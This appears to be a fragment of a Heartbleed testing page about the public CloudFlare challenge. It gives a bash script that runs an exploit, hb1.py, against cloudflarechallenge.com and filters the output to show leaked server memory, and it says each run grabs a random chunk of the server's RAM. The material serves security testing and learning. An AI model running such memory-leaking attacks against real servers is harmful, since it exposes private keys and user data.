HOWEVER--It occurs to me that there is a simple explanation. I don't think we are really finding the original key--we are finding the RAM used by the real winner when he submitted the key.
mv hb1.pyx hb1.py
Make it executable with chmod a+x
#!/bin/bash python hb1.py www.cloudflarechallenge.com > /tmp/attackcf0 tail -n 1026 /tmp/attackcf0 | head -n 1024 > /tmp/attackcf1 cut -c 58-73 /tmp/attackcf1 > /tmp/attackcf2 tr -d '\n' < /tmp/attackcf2 > /tmp/attackcf3 tr -d '.' < /tmp/attackcf3 > /tmp/attackcf4 cat /tmp/attackcf4
Each time you execute that script, it will grab a random chunk of RAM from CloudFlare's server.
More Heartbleed tests and projects